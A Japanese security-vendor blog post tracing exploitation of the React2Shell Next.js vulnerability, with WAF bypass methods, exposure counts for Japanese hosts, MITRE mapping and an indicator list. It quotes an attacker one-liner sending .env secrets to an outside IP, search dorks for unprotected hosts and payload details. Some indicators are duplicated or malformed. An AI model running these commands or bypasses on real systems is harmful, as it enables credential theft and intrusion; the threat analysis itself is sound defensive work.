top of page

Latest Articles

Tag

React2Shellタイムライン:WAFをバイパスせよ!エクスプロイトのペイロード分析と日本のデジタルインフラへの影響

  • Pipeline Co. Ltd.
  • 1 日前
  • 読了時間: 17分

著者: レイベン・T・コルテス


ree

ハッピーフライデー!嵐の前の静けさのようで、セキュリティコミュニティは、CVE-2025-66478 に対する実用的な PoC (概念実証) エクスプロイトの詳細が最近公開されたことを受けて、過去 48 時間以内にようやく元の状態に戻りました。これは、Vercel によって作成された、React 上に構築された未公開の Next.js の脆弱性です。美しくインタラクティブなユーザーインターフェイスの作成に重点を置いているため、広く使用されているフロントエンドライブラリは、世界中で 8,200 万を超える Web サイトを獲得し、国家レベルの攻撃者 (中国) が、私たちがspawnsquattingと名付けたい手法を再び使用したことで、一夜にして世界で最も人気のある攻撃対象領域となりました。これは、脅威アクターが、昨年 5 月の Sharepoint CVE-2025-53770 のように、多くのケースで既に確認されている、公開されている N デイ脆弱性を事実上スポーンキリングしているときです。このようなケースでは、セキュリティ研究者や CTF プレーヤーがゼロデイエクスプロイトのウィンドウで役割を果たすハッキングコンテストによって、野生のエクスプロイトが実行されるリスクが高くなります。ここ何時間もテストしていたオタクたちがここにいます。

Censys Dork: host.services.software.product = "nextjs" AND host.location.country="Japan" AND NOT host.services.labels.value="HONEYPOT" AND NOT host.services.labels.value="WAF" AND NOT host.services.labels.value="Firewall"
Zoomeye Dork: vuln.cve="CVE-2025-55182" && app="Next.js" && country="Japan"

Webアプリケーションファイアウォールなし

ウェブアプリケーションファイアウォール

17, 146

1,175

結果: 18,293

Figure 1: 17,146 Japan React Nextjs host without a dedicated Layer 7 WAF (Web Application Firewall)
Figure 1: 17,146 Japan React Nextjs host without a dedicated Layer 7 WAF (Web Application Firewall)
Shodan Dork: "X-Powered-By" "next.js" 国:JP

結果: 38,471

Figure 2: Total Japan React Next.js hosts Unfitered
Figure 2: Total Japan React Next.js hosts Unfitered

オーバーリアクト:時系列タイムライン


NVD公開のわずか4日前の11月29日1時57分(UTC) 、Lachlandと協力したSylvieは、3番目のPoC 02-meow-rce-pocの3つの難読化されたハッシュペイロードを公開しました。これは、これから起こることを間接的に示唆する、嵐の前の静けさでした。CWE-502:React Server ComponentsのFlightプロトコルコンポーネントにおける逆シリアル化。これは、難読化されたネストされたペイロードを作成することで実行されます。

SSRF の multipart/form 経由の HTTP POST - (サーバー側) 関数、認証されていないリモート コード実行への逆シリアル化。

注: 心配しないでください。各コンポーネントがどのように機能するかについて、より詳細な説明をします。

2025年12月2日( 12月3日のNVD公開の12時間前) - Cloudflareは、無料および有料のお客様向けに更新されたルールセットをプロアクティブに導入します。保護はレイヤー7で、 CloudflareからプロキシされたHTTPバッファを介した検査で、128KBのサイズ制限が適用されます。このプロアクティブながらも未熟なルールのサイズ制限は、今後の世界的な障害に影響を与えるため、この点にご注意ください。Reactサーバーコンポーネントのデフォルトサイズは1MB以上ですが、これは攻撃者がジャンクデータを事前に投げ込むことでこのリアルタイムHTTP制限検査を回避することに適応しているためです。


注: 研究者らは、 UTF16LEUnicodeのさまざまなエンコード形式を使用してバイパスをテストしました。

Figure 1: ejpir - Tested 3 Non-functioning payload
Figure 1: ejpir - Tested 3 Non-functioning payload

2025年12月3日17:00 UTC 、LachlandはNVD(National Vulnerability Database)への公開からわずか1時間後に、公式アドバイザリページreact2shell.comを公開しました。公開から1時間以内に、 BankkRollを皮切りに基本的なスキャナが大量に出現し、その後、Ejpirの研究者が図1に示す3つの異なるペイロードをテストするようになりました。これらは、機能しないHTTPペイロードパラメータ$ACTION_REF_0$ACTION_0:0です。 サーバー側の関数を返送できませんでした。しかし、Maple が実行したと思われる任意のリモートコード実行、あるいは APT 攻撃が実証されました。


注: PoCはNVD公開の5時間後に公開されました。このPoCはAI Claudeの支援を受けた可能性があります。
ree

2025年12月3日- Ejpirが動作しないPoCとNVDを公開する数時間前、AWS Madpot Honeypotsは、中国系アクターであるEarth LamiaとJackpot Pandaによる実環境のエクスプロイトを即座に検出しました。このイベントのタイムライン分析に基づくと、彼らが最初にEjpirからPoCを悪用した可能性が非常に高いと考えられます。これは、当社の1時間ごとのタイムラインとも一致しています。さらに、AWSは最初の一連のエクスプロイトでリモートコード実行が成功したかどうかについては具体的に言及していません。

注: 中国の脅威グループは武器化/逆転 NVD公開から5~6時間後のEjpir PoC

2025年12月4日21時04分(UTC)台湾CTFプレイヤーのmaple3142は、AWSレポートによって実環境のエクスプロイトがトリガーされてから18時間後に、Gist.githubでCVE-2025-55182のRCEエクスプロイトを公開しました。このエクスプロイトは、11月29日に非公開で公開されたMetaとReactサーバーコンポーネントの影響を受けるベンダーに対するLachlan Davidsonによるものとされていました。このエクスプロイトの構造は同じですが、Lachlandにはthen参照を介してシングルホップとマルチホップのニュアンスが異なる3つのエクスプロイトが含まれています。プロトタイプ汚染then:"$:__ proto__:then"を使用した偽のチャンクサイズインジェクションが

実際の RCE をトリガーする POST リクエスト経由のmultipart/form-data execSync('whoami')

_レスポンス プレフィックス


注: これにより、WAFとキャンペーンを回避するための難読化されたペイロードのバリエーションが開発されました。

2025年12月4日2時55分(UTC) 、Maple3142がPoCを公開してからわずか5時間後、セキュリティコミュニティと脅威アクターは、WAF(Webアプリケーションファイアウォール)を回避するための様々な難読化ペイロードのテストを開始しました。s1r1usが特定したある投稿では、coinbase、Spotify、coincdxなどを含む大手企業のサブドメインが脆弱性があると検証されています。PoCを公開すべきではなかったという後悔は珍しくありません。前述のように、SharePointのゼロデイエクスプロイトでも同様の傾向が見られました。


注: この規模でPoCを公開する研究者/CTF参加者には、より厳しい監視が必要です。

2025年12月5日11:05 UTC、 PoCの漏洩から14時間後、 Simon Konohenと共同でDefusedCyberハニーポットから検出された最初の成功した任意のリモートコード実行の1つをようやく観測しました。いくつかの組織のペイロードを相互参照した後、これが上記で示したMaple3142エクスプロイトコードで実証されたペイロードと全く同じであることを確認できました。最初のエクスプロイト波の活動に基づくと、攻撃者は単に.envから機密の認証情報を盗み出し、VTヒットの低い93.123.109.247の悪意のあるアドレスに送信しようとしただけで、これは長期的なスパイ活動や国家攻撃者の活動の特徴です。つまり、特に同じタイプの活動を観察した場合は、パッチを適用しても安全になったとは限らないということです。脅威アクターは、ローテーションされていない有効な認証情報から残した可能性のある永続化活動を利用できるようになります。

注: cat ./.env | wget --post-data="$(cat -)" -O- http[:]//93.123.109.247[:]8000

2025年12月5日12:00 UTC 、攻撃者が機密の認証情報を盗み出す中、日本のユーザーは複数の日本のウェブサイトで内部サーバーエラー500コードを経験し始めました。これは、CloudflareがHTTPバッファ検査を128KBから1MBに変更しようとしたことで、Cloudflare経由でプロキシされたトラフィックから世界中で断続的なエラーが発生していることと重なります。タイムラインのこの時点で、セキュリティコミュニティは既にVercel、Akamai、Cloudflareを含む複数のWAFベンダーに対してさまざまなバイパスをテストしていました。バイパスに成功したレイヤー7ファイアウォールは、1MBのプレーンテキスト制限検査を超えてジャンクデータを読み込むか、ペイロードをUTF16LE文字セットで完全に難読化するという2つの主な難読化手法を使用していました。


注: WAFはHTTPペイロードを検査する方法が限られているため、耐火性はありません。

2025年12月5日17:36 UTC以降、攻撃の大部分は完全に自動化されています。多くの被害者は、Mirai、RondoDox、そして北朝鮮の攻撃者によって現在武器化されているcryptodranerマルウェアキャンペーンなどのボットネットに利用されています。複数の報告から、John Hammondの投稿にあるcryptodranerマルウェアキャンペーンの例を取り上げます。多くのユーザーが、重大な脆弱性にまだ気付いていなかったため、cryptodranerを介して個人的に侵害を受け、テレメトリノードのCPU使用率が過剰になりました。確認されたマルウェアキャンペーンには、マルチステージXMmrig Monero Miner、MeshAgentRAT、DDosボットネットクライアントが含まれます。



これは日本の組織にとって何を意味するのでしょうか?

爆発半径は?その範囲は広大です。1万7千以上の日本の組織が、自社環境に専用のレイヤー7ファイアウォールを導入していないようです。WAF(Webアプリケーションファイアウォール)保護を導入していることが確認されているのはわずか1,175組織ですが、WAFは機能していない可能性さえあります。しかし、この地域に特化すると、デジタルインフラに関しては驚くことではありません。多くの日本の大手組織がインターネット保護にCloudflareを使用していますが、Cloudflareへの依存度が高いことが、重大な単一障害点を生み出しています。つまり、今後、組織は再び障害が発生した場合に備えて、Cloudflareに代わるバックアップとルーティングの代替手段を用意する必要があります。この代替手段のセットアップは、当社のITコンサルティングサービスの一環として支援いたします。さらに、当社のネイティブセキュリティソリューションであるRisksensorとThreatIDRは、このような活動からお客様を保護します。このような事態が再発する前に、すぐに推奨事項をご案内いたします。


日本とアジア太平洋地域への脅威?

その他の脆弱性については、機密性の高い.envファイルを閲覧するためのリモート実行が確認された場合、組織は直ちに認証情報をローテーションする必要があります。CVE-2025-1338などの他のNデイ脆弱性を狙う攻撃者にも注意が必要です。日本/APAC(アジア太平洋地域)の防御側は、Vshell、PeerBlight、EtherRat、Snowlight、PULSEPACKバックドア、そして中国系攻撃グループであるEarth Lamia、Jackpot Panda、DPRK、STAC6451、UNC5174に関連する悪意のあるインフラストラクチャといったマルウェアドロッパーに対する攻撃者の行動と防御を、エクスプロイト後の活動へとシフトさせる必要があります。さらに、最近、Earth Lamiaグループに起因するVshellバックドアに関連するエクスプロイト後の活動が急増していることが確認されており、これについては、以下の実用的な脅威情報に基づいた防御策として取り上げています。


React2 Shellタイムライン分析の結論

React2shellのタイムラインから、いくつかの懸念事項が浮かび上がります。その一つは、AI生成のClaudeツールが、EJpirで5時間未満で確認されたようにPoCエクスプロイトのリバース攻撃の速度を加速させるだけでなく、実際に動作するエクスプロイトコードの追跡において、より多くのノイズを発生させる可能性があることです。また、これらのツールの助けによって、研究者が脆弱性を迅速に発見したり、実際に動作する脆弱性に辿り着いたりすることができた可能性もあります。第二に、研究者やCTF参加者がこのような規模のRCEエクスプロイトを公開した場合、ソーシャルメディアでの監視と注目度の向上が必要です。これは、Sharepoint CVE-2025-53770や、昨年のScreenConnect RMM CVE-2024-1709で既に確認されています。第三に、攻撃者が攻撃を自動化し、WAF(Webアプリケーションファイアウォール)をバイパスするための様々な手法を習得し始めたスピードは、強固な階層化セキュリティを必要とする脅威アクターにとって、防御の弱点を露呈させています。 4つ目に、組織は、通常の営業時間外、特に週末や金曜日に発生する攻撃を明確にカバーするための、確固としたインシデント対応計画とバックアップを整備する必要があります。これらの時間帯は、組織が最も脆弱な時間帯です。最後に、ダウンタイムが最も深刻な場合、Cloudflareのインターネットトラフィックやレイヤー7 WAFに依存している場合は、同様の事態が再発した場合に備えて、代替ルーティングのバックアップを構築することをお勧めします。


自分が脆弱かどうかを知るにはどうすればいいでしょうか?

既に多くのスキャナーや検証スクリプトが存在しますが、ターゲットが脆弱な場合は、ターミナルから同じように細工したHTTP POSTリクエストを使用して、ターミナルから安全に検証することも可能です。これは推奨されませんが、手間をかけずに実行できます。


ree

注: 500 応答ステータスコードを受信すると、ターゲットが脆弱であると検証され、その逆も同様です。

RiskSensorソリューション:リアルタイム識別

リアルタイムの識別をお探しなら、RiskSensor は2025年の受賞歴を誇るソリューションです。あらゆる環境における攻撃対象領域を迅速に検証します。プロアクティブな脅威調査チーム Unit Zero と連携し、React2Shell のタイムライン分析に基づいて組織に情報を提供し、日本およびアジア太平洋地域のお客様をより適切に保護します。

MITRE ATT&CK マッピング

地球ラミア脅威グループのプロフィール

マイターID

技術

コンテクスト

リンク

T1595.001

アクティブスキャン: IPブロックのスキャン

大規模なIP範囲をスキャンしてライブホストを識別する

T1595.002

アクティブスキャン:脆弱性スキャン

既知の脆弱性を調査するシステム

T1592

被害者ホスト情報を収集する

対象となるハードウェア、OS、ソフトウェア、パッチに関する詳細の収集

T1583.001

インフラストラクチャの取得: ドメイン

運用に使用するためのドメインの登録または購入

T1583.003

インフラストラクチャの取得: 仮想プライベートサーバー

C2またはステージング用のVPSインスタンスをレンタルまたは侵害する

T1587.001

開発能力: マルウェア

悪意のあるペイロードの作成またはカスタマイズ

T1190

公開アプリケーションを悪用する

インターネットに接続するアプリケーションの脆弱性を悪用する

T1078

有効なアカウント

初期アクセスに盗まれた認証情報またはデフォルトの認証情報を使用する

T1059.001

コマンドおよびスクリプトインタープリター: PowerShell

PowerShell 経由でコマンドとスクリプトを実行する

T1059.003

コマンドおよびスクリプトインタープリター: Windows コマンドシェル

cmd.exe 経由でコマンドを実行する

T1136.001

アカウントの作成: ローカルアカウント

永続化のためのローカルアカウントの作成

T1053.005

スケジュールされたタスク/ジョブ: スケジュールされたタスク

アクセスを維持するためのスケジュールされたタスクの作成

T1505.003

サーバーソフトウェアコンポーネント: Web Shell

侵害されたウェブサーバーにウェブシェルをインストールする

T1068

権限昇格のための悪用

脆弱性を悪用してより高い権限を取得する

T1078.003

有効なアカウント: ローカルアカウント

侵害されたローカルアカウントを使用して横方向の移動やエスカレーションを行う





T1140

ファイルまたは情報の難読化解除/デコード

実行時に難読化されたペイロードをデコードする

T1562.001

防御を弱める: ツールを無効化または変更する

ウイルス対策、EDR、またはログ記録メカニズムを無効にする

T1070.001

インジケーターの削除: Windows イベント ログをクリアする

アクティビティを隠すためにイベントログを削除する

T1036.005

偽装: 正当な名前または場所と一致

悪意のあるファイルやツールに名前を付けて、正規のものと紛らわしくする

T1003.001

OS 資格情報のダンプ: LSASS メモリ

LSASSプロセスメモリから資格情報をダンプする

T1003.002

OS 資格情報のダンプ: セキュリティ アカウント マネージャー

SAMデータベースからパスワードハッシュを抽出する

T1087.001

アカウントの検出: ローカルアカウント

システム上のローカルユーザーアカウントの列挙

T1087.002

アカウント検出: ドメインアカウント

ドメインユーザーアカウントの列挙

T1482

ドメイン信頼検出

ドメインとフォレストの信頼の検出

T1570

横方向のツール転送

侵害されたシステム間でツールやペイロードを移動する

T1005

ローカルシステムからのデータ

エンドポイントから機密ファイルを収集する

T1105

イングレスツール転送

C2経由で追加のツールやペイロードをダウンロードする

T1573.001

暗号化チャネル:対称暗号

AESなどのアルゴリズムでC2トラフィックを暗号化する

T1571

非標準ポート

コマンドアンドコントロールトラフィックに珍しいポートを使用する

T1041

C2チャネル経由の流出

盗んだデータを既存のC2チャネル経由で送り返す

KQL検出ルール

React2Shell 検出ルールは、機密性の高い .env ファイルと IoC を表示するための RCE の試みのみを検出します。

インジケーターとC2ドメイン

CVE-2025-55182のタイムリーな悪用に関連する収集された指標の包括的なリスト

インジケータ

タイプ

注記

159.75.183.3

IPV4

アースラミア Vshell CnC

32d28202fe3339e36dc5bba498e8ab1c0fff94a3f88a6466c09d9c696eb914fc

SAH256

アースラミアVシェル

9f7c4faf86b1680d9a6f43e2f28443e1abba19fb14f0ca223235beb90eaab9cd

SAH256

アースラミア

653c3318dc1b0bafa3a5549d5222ee24e62f5f36a30319ba85e03332f03051bf

SHA256

アースラミア

444837ab41577a1aa7a1c83a150b5e1077db949defec2eb2f7dc79ee4ee1dd71

SHA256

アースラミア

45.157.233.80

IPV4

クライオトマイナー

3baa4c72dfe055193191dbffe5211298beaac2bde9b770c4f4e0fdcf897f2da6

SHA256

アースラミアVシェル

3.1.83.60

IPV4

アースラミアVシェル

894bde348e881b4e89887f1c55cfb21f13e47d7819d2e207ab60712175b66c29

SHA256

Cryptodraner マルウェア

2530ebc8e77c784ffe628b3588739ff096a2af4437656144983d1ba04b11538f

SHA256

Cryptodraner マルウェア

9007bb4a6b8cdeff55224dbbd4b1516669f0737e5ff4590cd4c5aa9cc5b464ed

SHA256

エージェント

bb6a05f3bcc5a7bbf5bdf6e5d555c3d51008dcc16f77c48409cad03a06576407

SHA256

Agtisx.exe

8067c9bf0ca1a67352fc7b8c9cc99fed8d9f3f57246712a6cd692edc4b66d323

SHA256

みらい

176.117.107.154

IPV4

暗号

193.34.213.150

IPV4

みらい

23.132.164.54

IPV4

暗号通貨マイナー

176.65.148.246

IPV4

クリプトマインダー

23.228.188.126

IPV4

みらい

fb82f971bd0cc752c65bb5fbe2300c77c85e48b8e4742692539e410841971610

SHA256

みらい

176.65.148.246

SHA256

みらい

93.123.109.247

IPV4

CVE-2025-55182

04aa866bc74fad3811d07e4f260bc7c2248bfc433d4f2f0f340a0c21a879edac

SHA256

Mirai シェルスクリプト

0a85c52582b87383dc226c9b401374e80424d05a3ade681227398d382bfacd1c

SHA256

Mirai シェルスクリプト

24015789fa841ad8c1818b296d3219a15005ce7695a0d819b8be5ea531ee06e5

SAH256

Mirai シェルスクリプト

43d64a7221f45908bbe400229966cebdc5a9e762391edcc23f68ddc623477c3b

SHA256

Mirai シェルスクリプト

451a75780c8ddf51a4dcb94b360dff5fc754ac51aea246a703c0584be9098079

SHA256

Mirai シェルスクリプト

7154d5925302249e61646b00cb18476338977d1d54c095b9298deb378349df90

SHA256

Mirai シェルスクリプト

7f02bf55246aa3478146f8220cf45ca40fba6845c21c833856b76a8b1e4619a4

SHA256

Mirai シェルスクリプト

86f999565282db9794bb1ca355c68ea7db0e4e7c8b16262bbf2b98d89cdc5439

SHA256

Mirai シェルスクリプト

9eee11a8b8e350e7b346951835e171778b7befc61f0ecab0f2945f1ee64b255b

SHA256

Mirai シェルスクリプト

be4ef749ce36a434abee6fb7cf867ddfc27a7b4bba5bc861110876f602f26de5

SHA256

Mirai シェルスクリプト

ac4d516e5645ff1edf3c1c8bd27544a4b5816582b368131be78fd97de64fd797

SHA256

Mirai シェルスクリプト

c67d4803ab8d7c97a0753fc4e4a94f9df6523147cc529da3ed7e29efec0549d3

SHA256

Mirai シェルスクリプト

e94d93f01e04c177cd3a4702a1ffd972cea4d446b6ddec08a6994a767c9c6bf4

SHA256

Mirai シェルスクリプト

fc8d391c9a81d3621ffd52a94be95406fe642107f3a6be1300d1c1354d53c341

SHA256

Mirai シェルスクリプト

31.56.27.97

IPV4

クリプトドレイナー

41.231.37.153

IPV4

みらい

51.91.77.94

IPV4

みらい

ax29g9q123.anondns.net

ドメイン

みらい

dockerdupdate.anondns.net

ドメイン

みらい

ドメイン

みらい

gfxnick.emerald.usbx.me

ドメイン

みらい

192.142.147.209

IPV4

みらい

95.214.52.170

IPV4

みらい

45.157.233.80

IPV4

みらい

108.171.195.163

IPV4

CVE-2025-55182

113.161.34.240

IPV4

CVE-2025-55182

116.208.93.64

IPV4

CVE-2025-55182

119.110.207.48

IPV4

CVE-2025-55182

123.30.5.226

IPV4

CVE-2025-55182

123.253.111.41

IPV4

CVE-2025-55182

129.148.46.228

IPV4

CVE-2025-55182

143.198.145.163

IPV4

CVE-2025-55182

146.88.129.138

IPV4

CVE-2025-55182

149.34.253.147

IPV4

CVE-2025-55182

149.88.23.79

IPV4

CVE-2025-55182

154.214.100.130

IPV4

CVE-2025-55182

154.90.51.121

IPV4

CVE-2025-55182

157.180.62.92

IPV4

CVE-2025-55182

172.184.211.80

IPV4

CVE-2025-55182

172.245.59.249

IPV4

CVE-2025-55182

185.220.238.191

IPV4

CVE-2025-55182

185.237.166.132

IPV4

CVE-2025-55182

192.210.241.12

IPV4

CVE-2025-55182

192.42.116.211

IPV4

CVE-2025-55182

195.184.76.42

IPV4

CVE-2025-55182

198.12.111.122

IPV4

CVE-2025-55182

202.59.10.135

IPV4

CVE-2025-55182

205.198.85.23

IPV4

CVE-2025-55182

212.104.215.139

IPV4

CVE-2025-55182

216.144.235.201

IPV4

CVE-2025-55182

216.45.58.177

IPV4

CVE-2025-55182

23.225.6.26

IPV4

CVE-2025-55182

27.74.251.56

IPV4

CVE-2025-55182

38.54.85.208

IPV4

CVE-2025-55182

43.247.134.215

IPV4

CVE-2025-55182

45.127.35.199

IPV4

CVE-2025-55182

45.129.231.10

IPV4

CVE-2025-55182

45.141.215.61

IPV4

CVE-2025-55182

45.84.107.54

IPV4

CVE-2025-55182

46.62.230.188

IPV4

CVE-2025-55182

47.77.204.208

IPV4

CVE-2025-55182

47.88.21.119

IPV4

CVE-2025-55182

8.138.24.55

IPV4

CVE-2025-55182

84.11.167.3

IPV4

CVE-2025-55182

85.237.206.157

IPV4

CVE-2025-55182

89.150.48.74

IPV4

CVE-2025-55182

91.210.107.156

IPV4

CVE-2025-55182

91.212.166.110

IPV4

CVE-2025-55182

95.214.52.170

IPV4

CVE-2025-55182

37.114.37.82

IPV4

クリプトドレイナー

37.114.37.94

IPV4

クリプトドレイナー

23.235.188.3

IPV4

PowerShellアクティビティ

193.143.1.153

IPV4

コバルトストライク

45.77.33.136

IPV4

ジャックポットパンダ

206.237.3.150

IPV4

アースラミア

183.6.80.214

IPV4

中国とのつながり

143.198.92.82

IPV4

アースラミア

15724b46a96a71d1a50fa55800f13fb0a06b2c813e5205ac984056bf67dff85b

IPV4

アースラミアVシェル

ドメイン

アースラミア

d3hg0xriyu9bjh.cloudfront[.]net

ドメイン

アースラミア

dxzdq7un7c7hs.cloudfront[.]net

ドメイン

アースラミア

103.30.76.206

IPV4

アースラミア スノーライト / Vシェル

bc647e05eea89ea9b5ec3ce728e3c039dd2abd17441e7c39cf130f292edd6efc

SHA256

Earth Lamia PULSEPACK プラグイン

7df588daaa053890cebfc0ac09b3c6b64bac4523719bc88323af6cc7e64377ed

SHA256

アースラミア パルスパック ウェブソケット

f6ebd2d15f2ae5d0e319ca48d58716db7af1cc1e6200ace1752aad8f446fcef8

SHA256

アースラミア パルスパック ウェブソケット

206.206.78.33

IPV4

アースラミアVシェル

95682e021447f2a283e03d8d049f3f22e1f83da30dc55c5194f9c655c806decd

SHA256

アースラミアVシェル

a0d18728aa159537e436ef0ffcfe272e4a8fc369980c696b2bbf41fc1390b301

SHA256

アースラミアVシェル

52adc6234efa29d74addd083703c90c5198c37703733153d3dc9f0b8fb7a16c0

SHA256

アースラミアVシェル

42.192.60.49

IPV4

Vシェル

ca51db1adeda7303a3aee3feef411e1373d0d26c6b3e14a7a81cd011c855f

SHA256

PULSEPACKバックドアの可能性

40569370f60f3ca9748724c58f92069e36c33313283cf95496ac587b5e561199

SHA256

アースラミアVシェル

cfe5c46e00babe4c91135cb2ec89852b764b1c255f3c6a220bf90f35aac3dff8

SHA256

アースラミアVシェル

007e5c38bbd52a9f65474fef45ba69c21d6b76c0598fbc6d0aae9fe8daa548b1

SHA256

Xmrig FUD

b67221d6057a2a08bd19cdebf22e6d5557a8794463413e6fc128c7ec15a41415

SHA256

クリプトドレイナー

106.15.124.100:6666

IPV4

中国知的財産

38.246.244.223:12233

IPV4

中国知的財産

171.252.32.135:7700

IPV4

ベトナム知的財産

38.246.244.223:12233

IIPV4

鉱夫

65.49.236.227:6666

IPV4

日本知的財産

8.155.144.158:8892

IPV4

中国知的財産

66.154.106.246:8088

IPV4

鉱夫

ドメイン

鉱夫

e1aca24e6475a1d9f53784c6be4798b738100d44935eb4dfb1801e7f1446658d

SHA256

DLL FUD

9ba6aad7060fcb380ec7f44e6930580ee146fbc579090665f26e204d57bc0585

SHA256

ウイルス[.]sh

0890d2e6a0ea8601666369f4c63978c7cc7198cd06aec728c0496751eb1ef046

SHA256

シェル

128.199.194.97:9001

IPV4

.shスクリプトを実行する

ae4991476ed082920e674457f4eceb71367265f4d2150b89214abceb9ebf2407

SHA256

setup2[.]sh シェル

clearskyspark[.]トップ

ドメイン

ステージングドメイン

05277a3a9674f4c687beac129a1eaa41903b305d576e1a469cc62637701e878e

SHA256

シェル

c55836f1df7c053cb389886602ab25a8001f23ded87109939507c6f90d69c6eb

sha256

setup2[.]sh シェル

deepcloudspark[.]トップ

ドメイン

ステージングドメイン

greenhillmatrix[.]トップ

ドメイン

ステージングドメイン

サイレントマウントコード[.]トップ

ドメイン

ステージングドメイン

154.89.152.247

IPV4

ステージングアドレス

154.89.152.168

IPV4

ステージングアドレス

154.89.152.151

IPV4

ステージングアドレス

154.89.152.170

IPV4

ステージングアドレス

43.152.234.213

IPV4

アースラミアVシェル

43.152.234.213

IPV4

Vシェル

91cca9db00070f0ae92ae8bc14306b10fbd54e1bd5fe785c0e62cfecd92afa1f

SHA256

アースラミアVシェル

bba76eed1d4c13006e7ab47757ea400ff01134403c6bfd70d0d136e3ff5cabb8

SHA256

アースラミアVシェル

107.175.76.208

IPV4

Vshell Vshell FUD

17271fce020d63450a5d4dd17dd3186c53fa22704e6973ef7d51da5505a0f468

SHA256

Vshell バックドア

6b14a1aae8339262628e56f02c1f11963d90760c339631d733fe449d536c302c

SHA256

Vシェル

115.42.60.57

IPV4

Vshell バックドア

17acdef55bdc663b66840c2d8b18c0f052fab9f307e2f7889e5e2296ce807691

SHA256

Vshell バックドア

bae364eb1473d616facdb82443d83af1bd832cd2bd29553ed1f4c44dfb1cf5ad

SHA256

Vshell バックドア

abcfac672ce387984197f68bb8d99c5963ca15763034ec7d37e82ff8275f58d0

SHA256

鉱夫

192.24.123.68

IPV4

北朝鮮

22f96d61cf118efabc7c5bf3384734fad2f6ead4

SHA1

北朝鮮

e941a9b283006f5163ee6b01c1f23aa5951c4c8d

SHA1

北朝鮮

787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c

SHA256

鉱夫

185.221.154.208

IPV4

キンシング

185.154.533.140

IPV4

キンシング

31.184.240.34

IPV4

キンシング

6fc94d8aecc538b1d099a429fb68ac20d7b6ae8b3c7795ae72dd2b7107690b8f

SHA256

キンシング

65b1c2f9aacc2f3fabc6994b0e8bc0c4023090577d9545bf5371003d3810a81b

SHA256

キンシング

78.153.140

IPV4

キンシング

7e0a0c48ee0f65c72a252335f6dcd435dbd448fc0414b295f635372e1c5a9171

SHA256

キンシング

223.5.5.5

IPV4

中国知的財産

7e0a0c48ee0f65c72a252335f6dcd435dbd448fc0414b295f635372e1c5a9171

SHA256

みらい

9ba6aad7060fcb380ec7f44e6930580ee146fbc579090665f26e204d57bc0585

SHA256

みらい

2f48e092050b7f050bc3085864598df02766d0416417e2ce4d5703b790f325f2

SHA256

スクリプト

193.34.213.150

IPV4

鉱夫

894bde348e881b4e89887f1c55cfb21f13e47d7819d2e207ab60712175b66c29

SHA256

XmRig

128.199.194.97

IPV4

鉱夫

9ba6aad7060fcb380ec7f44e6930580ee146fbc579090665f26e204d57bc0585

SHA256

鉱夫

ae4991476ed082920e674457f4eceb71367265f4d2150b89214abceb9ebf2407

SHA256

鉱夫

78.153.140.16

IPV4

鉱夫

65b1c2f9aacc2f3fabc6994b0e8bc0c4023090577d9545bf5371003d3810a81b

SHA256

鉱夫

2f48e092050b7f050bc3085864598df02766d0416417e2ce4d5703b790f325f2

SHA256

スクリプト

193.34.213.150

IPV4

ステージングアドレス

894bde348e881b4e89887f1c55cfb21f13e47d7819d2e207ab60712175b66c29

SHA256

鉱夫

2530ebc8e77c784ffe628b3588739ff096a2af4437656144983d1ba04b11538f

SHA256

鉱夫

176.117.107.154

IPV4

鉱夫

128.199.194.97

IPV4

鉱夫

115.42.60.163

IPV4

Vシェル

15724b46a96a71d1a50fa55800f13fb0a06b2c813e5205ac984056bf67dff85b

SHA256

Vシェル

15724b46a96a71d1a50fa55800f13fb0a06b2c813e5205ac984056bf67dff85b

SHA256

Vシェル

251e8f53e66d26f748efdab49a9b92e07eaaec71e83bfa932ed8fb7322df2cb7

SHA256

Vシェル

5212093ae6434bc77f4d3b00ef19a12cb746ea45248b65d0e6ebc6e020d95ec8

SHA256

Vシェル

bae364eb1473d616facdb82443d83af1bd832cd2bd29553ed1f4c44dfb1cf5ad

SHA256

Vシェル

17271fce020d63450a5d4dd17dd3186c53fa22704e6973ef7d51da5505a0f468

SHA256

Vシェル

6b14a1aae8339262628e56f02c1f11963d90760c339631d733fe449d536c302c

SHA256

Vシェル

5a51224b9624899d329fba297f6155e41013f1aa92a6cd6b4e058b11ceca79b4

SHA256

Vシェル

bba76eed1d4c13006e7ab47757ea400ff01134403c6bfd70d0d136e3ff5cabb8

SHA256

Vシェル

bba76eed1d4c13006e7ab47757ea400ff01134403c6bfd70d0d136e3ff5cabb8

SHA256

Vシェル

326c7404a30b313f2c2ac1d6cd5ede0b1238fcc7fea2d546919bdb3d71366b71

SHA256

Vシェル

653c3318dc1b0bafa3a5549d5222ee24e62f5f36a30319ba85e03332f03051bf

SHA256

Vシェル

9f7c4faf86b1680d9a6f43e2f28443e1abba19fb14f0ca223235beb90eaab9cd

SHA256

Vシェル

95682e021447f2a283e03d8d049f3f22e1f83da30dc55c5194f9c655c806decd

SHA256

Vシェル

52adc6234efa29d74addd083703c90c5198c37703733153d3dc9f0b8fb7a16c0

SHA256

Vシェル

40569370f60f3ca9748724c58f92069e36c33313283cf95496ac587b5e561199

SHA256

Vシェル

0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce

SHA256

Vシェル

776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273

SHA256

カウトンネル

a605a70d031577c83c093803d11ec7c1e29d2ad530f8e95d9a729c3818c7050d

SHA256

ピアブライト

3854862bb3ee623f95d91fa15b504e2bbc30e23f1a15ad7b18aedb127998c79c

SHA256

スクリプト

2cd41569e8698403340412936b653200005c59f2ff3d39d203f433adb2687e7f

SHA256

スライバーC2

65d840b059e01f273d0a169562b3b368051cfb003e301cc2e4f6a7d1907c224a

SHA256

スクリプト

207.148.79.178

IPV4

CnC

45.32.158.54

IPV4

ピアブライト

参考文献






































Latest Articles

Tag

Latest Articles

bottom of page